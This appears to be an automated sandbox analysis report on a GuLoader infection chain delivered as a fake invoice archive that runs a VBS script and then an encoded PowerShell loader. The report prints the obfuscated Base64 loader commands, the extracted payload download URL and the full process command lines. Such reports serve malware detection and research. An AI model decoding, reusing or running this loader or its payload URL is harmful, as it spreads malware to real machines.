ACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 620 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
            • cvtres.exe (PID: 316 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
    Multi AV Scanner detection for submitted file
    Source: WWVN_INVOICE_8363567453.lzhVirustotal: Detection: 25%Perma Link
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
    Source: Binary string: Xl7C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.pdb source: powershell.exe, 00000016.00000002.518463762.000000000523E000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 00EE09D3h
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 00EE09D2h

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: http://barsam.com.au/bin_FCWtLoO90.bin
    Potential malicious VBS script found (has network functionality)
    Source: C:\Windows\SysWOW64\7za.exeDropped file: Than21.SaveToFile FileName, adSaveCreateOverWriteJump to dropped file
    Source: powershell.exe, 00000016.00000002.516470478.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000016.00000002.517426585.000000000512F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Very long command line found
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 16636
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 16636
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00EE02A8
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00EE0298
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116E700
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116BDB8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0116BDC8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C80040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C8379B
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C882F8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C80015
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07C83675
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_07CB9C00
    Source: C:\Windows\SysWOW64\wscript.exeProcess Stats: CPU usage > 98%
    Source: WWVN_INVOICE_8363567453.lzhVirustotal: Detection: 25%
    Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
    Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
    Source: unknownProcess created: C:\Windows\SysWOW64\unarchiver.exe C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3" "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.lzh
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs"
